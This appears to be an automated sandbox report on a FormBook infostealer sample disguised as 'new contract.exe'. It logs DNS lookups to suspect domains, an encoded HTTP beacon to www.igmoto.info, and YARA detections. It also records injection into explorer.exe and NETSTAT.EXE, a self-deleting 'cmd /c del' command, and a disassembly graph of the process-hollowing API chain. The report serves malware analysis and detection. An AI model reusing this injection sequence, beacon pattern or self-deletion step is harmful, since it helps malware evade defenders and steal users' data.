                                                                                                                                                                          Oct 10, 2024 21:06:22.303647041 CEST192.168.2.41.1.1.10xdc3dStandard query (0)www.aser-cap-hair-growth.todayA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:06:42.447335958 CEST192.168.2.41.1.1.10xaac1Standard query (0)www.igmoto.infoA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:07:03.708362103 CEST192.168.2.41.1.1.10x9fa7Standard query (0)www.olar-systems-panels-61747.bondA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:07:24.403346062 CEST192.168.2.41.1.1.10xaa83Standard query (0)www.arklife.shopA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:07:44.887103081 CEST192.168.2.41.1.1.10xc54bStandard query (0)www.sofaerb.shopA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:08:05.294194937 CEST192.168.2.41.1.1.10xa781Standard query (0)www.uickautoquote.netA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:08:46.133080959 CEST192.168.2.41.1.1.10x80f9Standard query (0)www.ldkp.netA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:09:08.146991014 CEST192.168.2.41.1.1.10x5a3dStandard query (0)www.r64mh1.vipA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:09:28.303445101 CEST192.168.2.41.1.1.10xc1feStandard query (0)www.aycare-service-99683.bondA (IP address)IN (0x0001)false

                                                                                                                                                                          DNS Answers

                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Oct 10, 2024 21:05:42.008086920 CEST1.1.1.1192.168.2.40x721dName error (3)www.livialiving.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:06:01.774740934 CEST1.1.1.1192.168.2.40x90b2Name error (3)www.innivip.biononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:06:22.322021961 CEST1.1.1.1192.168.2.40xdc3dName error (3)www.aser-cap-hair-growth.todaynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:06:42.465980053 CEST1.1.1.1192.168.2.40xaac1No error (0)www.igmoto.info89.31.143.90A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:07:03.720439911 CEST1.1.1.1192.168.2.40x9fa7Name error (3)www.olar-systems-panels-61747.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:07:24.414304018 CEST1.1.1.1192.168.2.40xaa83Name error (3)www.arklife.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:07:44.975795984 CEST1.1.1.1192.168.2.40xc54bName error (3)www.sofaerb.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:08:05.326864004 CEST1.1.1.1192.168.2.40xa781Name error (3)www.uickautoquote.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:08:46.164599895 CEST1.1.1.1192.168.2.40x80f9Name error (3)www.ldkp.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:09:08.158818960 CEST1.1.1.1192.168.2.40x5a3dName error (3)www.r64mh1.vipnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 10, 2024 21:09:28.411026001 CEST1.1.1.1192.168.2.40xc1feName error (3)www.aycare-service-99683.bondnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                          • www.igmoto.info

                                                                                                                                                                          HTTP Packets

                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.44997989.31.143.90802580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 10, 2024 21:06:42.476766109 CEST174OUTGET /c89p/?ohUpTpT0=uK/A8O6Hj9VReqQKS0ATE3Xrf7RWVy6yiEUunzdvsHMfMNs/vPJv/pK5tSC7SJ1XhvpN&BZL00t=YrClV4dXu8Ftc4cp HTTP/1.1
                                                                                                                                                                          Host: www.igmoto.info
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Oct 10, 2024 21:06:44.004156113 CEST450INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Thu, 10 Oct 2024 19:06:43 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Connection: close
                                                                                                                                                                          content-length: 265
                                                                                                                                                                          Server: UD Webspace 3.2
                                                                                                                                                                          Allow: GET, POST, HEAD
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 66 72 61 6d 65 73 65 74 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 73 63 72 6f 6c 6c 69 6e 67 3d 22 4e 4f 22 6e 6f 72 65 73 69 7a 65 3d 22 6e 6f 72 65 73 69 7a 65 22 3e 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 67 6d 6f 74 6f 2e 63 6f 6d 2f 22 3e 3c 6e 6f 66 72 61 6d 65 73 3e 20 2d 20 20 2d 20 69 67 6d 6f 74 6f 2e 69 6e 66 6f 3c 2f 6e 6f 66 72 61 6d 65 73 3e 3c 2f 66 72 61 6d 65 73 65 74 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <html><title></title><meta name="keywords"content=""><meta name="description"content=""><frameset framespacing="0"frameborder="0"rows="100%,*"scrolling="NO"noresize="noresize"><frame src="https://igmoto.com/"><noframes> - - igmoto.info</noframes></frameset></html>
                                                                                                                                                                          Oct 10, 2024 21:06:44.004348993 CEST450INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Thu, 10 Oct 2024 19:06:43 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Connection: close
                                                                                                                                                                          content-length: 265
                                                                                                                                                                          Server: UD Webspace 3.2
                                                                                                                                                                          Allow: GET, POST, HEAD
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 66 72 61 6d 65 73 65 74 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 73 63 72 6f 6c 6c 69 6e 67 3d 22 4e 4f 22 6e 6f 72 65 73 69 7a 65 3d 22 6e 6f 72 65 73 69 7a 65 22 3e 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 67 6d 6f 74 6f 2e 63 6f 6d 2f 22 3e 3c 6e 6f 66 72 61 6d 65 73 3e 20 2d 20 20 2d 20 69 67 6d 6f 74 6f 2e 69 6e 66 6f 3c 2f 6e 6f 66 72 61 6d 65 73 3e 3c 2f 66 72 61 6d 65 73 65 74 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <html><title></title><meta name="keywords"content=""><meta name="description"content=""><frameset framespacing="0"frameborder="0"rows="100%,*"scrolling="NO"noresize="noresize"><frame src="https://igmoto.com/"><noframes> - - igmoto.info</noframes></frameset></html>
                                                                                                                                                                          Oct 10, 2024 21:06:44.004874945 CEST450INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Thu, 10 Oct 2024 19:06:43 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Connection: close
                                                                                                                                                                          content-length: 265
                                                                                                                                                                          Server: UD Webspace 3.2
                                                                                                                                                                          Allow: GET, POST, HEAD
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 66 72 61 6d 65 73 65 74 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 73 63 72 6f 6c 6c 69 6e 67 3d 22 4e 4f 22 6e 6f 72 65 73 69 7a 65 3d 22 6e 6f 72 65 73 69 7a 65 22 3e 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 67 6d 6f 74 6f 2e 63 6f 6d 2f 22 3e 3c 6e 6f 66 72 61 6d 65 73 3e 20 2d 20 20 2d 20 69 67 6d 6f 74 6f 2e 69 6e 66 6f 3c 2f 6e 6f 66 72 61 6d 65 73 3e 3c 2f 66 72 61 6d 65 73 65 74 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <html><title></title><meta name="keywords"content=""><meta name="description"content=""><frameset framespacing="0"frameborder="0"rows="100%,*"scrolling="NO"noresize="noresize"><frame src="https://igmoto.com/"><noframes> - - igmoto.info</noframes></frameset></html>


                                                                                                                                                                          Statistics

                                                                                                                                                                          CPU Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Memory Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Behavior

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          System Behavior

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:15:04:58
                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\new contract.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\new contract.exe"
                                                                                                                                                                          Imagebase:0xbe0000
                                                                                                                                                                          File size:601'600 bytes
                                                                                                                                                                          MD5 hash:C6B38036B68EA21306E8814AB1B1B4D9
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:2
                                                                                                                                                                          Start time:15:05:03
                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\new contract.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\new contract.exe"
                                                                                                                                                                          Imagebase:0xad0000
                                                                                                                                                                          File size:601'600 bytes
                                                                                                                                                                          MD5 hash:C6B38036B68EA21306E8814AB1B1B4D9
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:3
                                                                                                                                                                          Start time:15:05:04
                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                          Imagebase:0x7ff72b770000
                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:15:05:07
                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\autofmt.exe"
                                                                                                                                                                          Imagebase:0xdf0000
                                                                                                                                                                          File size:822'272 bytes
                                                                                                                                                                          MD5 hash:C72D80A976B7EB40534E8464957A979F
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:5
                                                                                                                                                                          Start time:15:05:07
                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
                                                                                                                                                                          Imagebase:0x680000
                                                                                                                                                                          File size:32'768 bytes
                                                                                                                                                                          MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:15:05:11
                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:/c del "C:\Users\user\Desktop\new contract.exe"
                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:7
                                                                                                                                                                          Start time:15:05:11
                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Disassembly

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:9.4%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:232
                                                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                                                            execution_graph 24111 14b4668 24112 14b467a 24111->24112 24116 14b4686 24112->24116 24117 14b4779 24112->24117 24114 14b46a5 24122 14b3e34 24116->24122 24118 14b479d 24117->24118 24126 14b4879 24118->24126 24130 14b4888 24118->24130 24123 14b3e3f 24122->24123 24138 14b5c44 24123->24138 24125 14b6fe0 24125->24114 24128 14b48af 24126->24128 24127 14b498c 24127->24127 24128->24127 24134 14b44b4 24128->24134 24131 14b48af 24130->24131 24132 14b498c 24131->24132 24133 14b44b4 CreateActCtxA 24131->24133 24133->24132 24135 14b5918 CreateActCtxA 24134->24135 24137 14b59db 24135->24137 24139 14b5c4f 24138->24139 24142 14b5c64 24139->24142 24141 14b70ed 24141->24125 24143 14b5c6f 24142->24143 24146 14b5c94 24143->24146 24145 14b71c2 24145->24141 24147 14b5c9f 24146->24147 24150 14b5cc4 24147->24150 24149 14b72c5 24149->24145 24151 14b5ccf 24150->24151 24153 14b85cb 24151->24153 24157 14bac78 24151->24157 24152 14b8609 24152->24149 24153->24152 24161 14bcd78 24153->24161 24166 14bcd77 24153->24166 24171 14bacb0 24157->24171 24174 14baca0 24157->24174 24158 14bac8e 24158->24153 24162 14bcd99 24161->24162 24163 14bcdbd 24162->24163 24183 14bcf19 24162->24183 24187 14bcf28 24162->24187 24163->24152 24167 14bcd99 24166->24167 24168 14bcdbd 24167->24168 24169 14bcf19 GetModuleHandleW 24167->24169 24170 14bcf28 GetModuleHandleW 24167->24170 24168->24152 24169->24168 24170->24168 24178 14bada8 24171->24178 24172 14bacbf 24172->24158 24175 14bacb0 24174->24175 24177 14bada8 GetModuleHandleW 24175->24177 24176 14bacbf 24176->24158 24177->24176 24179 14baddc 24178->24179 24180 14badb9 24178->24180 24179->24172 24180->24179 24181 14bafe0 GetModuleHandleW 24180->24181 24182 14bb00d 24181->24182 24182->24172 24184 14bcf35 24183->24184 24185 14bcf6f 24184->24185 24191 14bbae0 24184->24191 24185->24163 24188 14bcf35 24187->24188 24189 14bcf6f 24188->24189 24190 14bbae0 GetModuleHandleW 24188->24190 24189->24163 24190->24189 24192 14bbaeb 24191->24192 24194 14bdc88 24192->24194 24195 14bd2dc 24192->24195 24194->24194 24196 14bd2e7 24195->24196 24197 14b5cc4 GetModuleHandleW 24196->24197 24198 14bdcf7 24197->24198 24198->24194 24199 77b07f8 24200 77b3438 CreateIconFromResourceEx 24199->24200 24201 77b34b6 24200->24201 24216 7984fee 24217 7984ff8 24216->24217 24218 7984fb4 24217->24218 24221 7985a20 24217->24221 24241 7985a86 24217->24241 24222 7985a3a 24221->24222 24262 7986259 24222->24262 24267 7985e26 24222->24267 24271 7985e06 24222->24271 24275 79866c5 24222->24275 24280 7986004 24222->24280 24285 798622f 24222->24285 24290 798660d 24222->24290 24295 7985fcd 24222->24295 24300 798638d 24222->24300 24306 798604a 24222->24306 24311 7986157 24222->24311 24316 79868f6 24222->24316 24320 7985f73 24222->24320 24326 7986771 24222->24326 24330 7985e3f 24222->24330 24334 7985f1d 24222->24334 24339 798647b 24222->24339 24223 7985a42 24223->24218 24242 7985a14 24241->24242 24244 7985a89 24241->24244 24245 7986259 2 API calls 24242->24245 24246 798647b 3 API calls 24242->24246 24247 7985f1d 2 API calls 24242->24247 24248 7985e3f 2 API calls 24242->24248 24249 7986771 2 API calls 24242->24249 24250 7985f73 2 API calls 24242->24250 24251 79868f6 2 API calls 24242->24251 24252 7986157 4 API calls 24242->24252 24253 798604a 2 API calls 24242->24253 24254 798638d 4 API calls 24242->24254 24255 7985fcd 2 API calls 24242->24255 24256 798660d 3 API calls 24242->24256 24257 798622f 4 API calls 24242->24257 24258 7986004 2 API calls 24242->24258 24259 79866c5 4 API calls 24242->24259 24260 7985e06 2 API calls 24242->24260 24261 7985e26 2 API calls 24242->24261 24243 7985a42 24243->24218 24244->24218 24245->24243 24246->24243 24247->24243 24248->24243 24249->24243 24250->24243 24251->24243 24252->24243 24253->24243 24254->24243 24255->24243 24256->24243 24257->24243 24258->24243 24259->24243 24260->24243 24261->24243 24263 798625f 24262->24263 24344 7984909 24263->24344 24348 7984910 24263->24348 24264 7985ed2 24268 7985e0a 24267->24268 24352 7984b98 24268->24352 24356 7984b8d 24268->24356 24272 7985e0a 24271->24272 24273 7984b98 CreateProcessA 24272->24273 24274 7984b8d CreateProcessA 24272->24274 24273->24272 24274->24272 24277 798617b 24275->24277 24276 79866d9 24277->24275 24277->24276 24361 7986c38 24277->24361 24367 7986c28 24277->24367 24281 7985fd1 24280->24281 24387 7984448 24281->24387 24391 7984450 24281->24391 24282 7985fef 24286 798617b 24285->24286 24287 79866d9 24286->24287 24288 7986c38 4 API calls 24286->24288 24289 7986c28 4 API calls 24286->24289 24288->24286 24289->24286 24294 7984370 2 API calls 24290->24294 24395 7984378 24290->24395 24291 79865e0 24291->24290 24292 7986082 24291->24292 24292->24223 24294->24291 24296 7985fd1 24295->24296 24298 7984448 VirtualAllocEx 24296->24298 24299 7984450 VirtualAllocEx 24296->24299 24297 7985fef 24298->24297 24299->24297 24301 798639d 24300->24301 24302 798617b 24300->24302 24303 79866d9 24302->24303 24304 7986c38 4 API calls 24302->24304 24305 7986c28 4 API calls 24302->24305 24304->24302 24305->24302 24307 7986053 24306->24307 24309 7984909 WriteProcessMemory 24307->24309 24310 7984910 WriteProcessMemory 24307->24310 24308 798651d 24308->24223 24309->24308 24310->24308 24312 798615d 24311->24312 24313 79866d9 24312->24313 24314 7986c38 4 API calls 24312->24314 24315 7986c28 4 API calls 24312->24315 24314->24312 24315->24312 24317 7985e0a 24316->24317 24318 7984b98 CreateProcessA 24317->24318 24319 7984b8d CreateProcessA 24317->24319 24318->24317 24319->24317 24321 7986277 24320->24321 24322 7986364 24321->24322 24324 7984909 WriteProcessMemory 24321->24324 24325 7984910 WriteProcessMemory 24321->24325 24322->24223 24323 7985ed2 24324->24323 24325->24323 24328 7984909 WriteProcessMemory 24326->24328 24329 7984910 WriteProcessMemory 24326->24329 24327 798679f 24328->24327 24329->24327 24331 7985e0a 24330->24331 24332 7984b98 CreateProcessA 24331->24332 24333 7984b8d CreateProcessA 24331->24333 24332->24331 24333->24331 24335 7985f23 24334->24335 24399 79849f8 24335->24399 24403 7984a00 24335->24403 24336 7985f54 24336->24223 24340 7986539 24339->24340 24342 7984378 Wow64SetThreadContext 24340->24342 24343 7984370 2 API calls 24340->24343 24341 7986554 24342->24341 24343->24341 24345 798490e WriteProcessMemory 24344->24345 24347 79849af 24345->24347 24347->24264 24349 7984958 WriteProcessMemory 24348->24349 24351 79849af 24349->24351 24351->24264 24353 7984c21 CreateProcessA 24352->24353 24355 7984de3 24353->24355 24357 7984b38 24356->24357 24358 7984b97 CreateProcessA 24356->24358 24357->24268 24360 7984de3 24358->24360 24362 7986c4d 24361->24362 24373 79842c8 24362->24373 24377 79842c1 24362->24377 24381 7984370 24362->24381 24363 7986c60 24363->24277 24368 7986c38 24367->24368 24370 79842c8 ResumeThread 24368->24370 24371 7984370 2 API calls 24368->24371 24372 79842c1 ResumeThread 24368->24372 24369 7986c60 24369->24277 24370->24369 24371->24369 24372->24369 24374 7984308 ResumeThread 24373->24374 24376 7984339 24374->24376 24376->24363 24378 79842c8 ResumeThread 24377->24378 24380 7984339 24378->24380 24380->24363 24382 7984318 ResumeThread 24381->24382 24384 7984377 Wow64SetThreadContext 24381->24384 24383 7984339 24382->24383 24383->24363 24386 7984405 24384->24386 24386->24363 24388 7984450 VirtualAllocEx 24387->24388 24390 79844cd 24388->24390 24390->24282 24392 7984490 VirtualAllocEx 24391->24392 24394 79844cd 24392->24394 24394->24282 24396 79843bd Wow64SetThreadContext 24395->24396 24398 7984405 24396->24398 24398->24291 24400 7984a00 ReadProcessMemory 24399->24400 24402 7984a8f 24400->24402 24402->24336 24404 7984a4b ReadProcessMemory 24403->24404 24406 7984a8f 24404->24406 24406->24336 24407 7986c80 24408 7986e0b 24407->24408 24410 7986ca6 24407->24410 24410->24408 24411 798453c 24410->24411 24412 7986f00 PostMessageW 24411->24412 24413 7986f6c 24412->24413 24413->24410 24202 14bd040 24203 14bd086 24202->24203 24207 14bd618 24203->24207 24210 14bd628 24203->24210 24204 14bd173 24213 14bd27c 24207->24213 24211 14bd656 24210->24211 24212 14bd27c DuplicateHandle 24210->24212 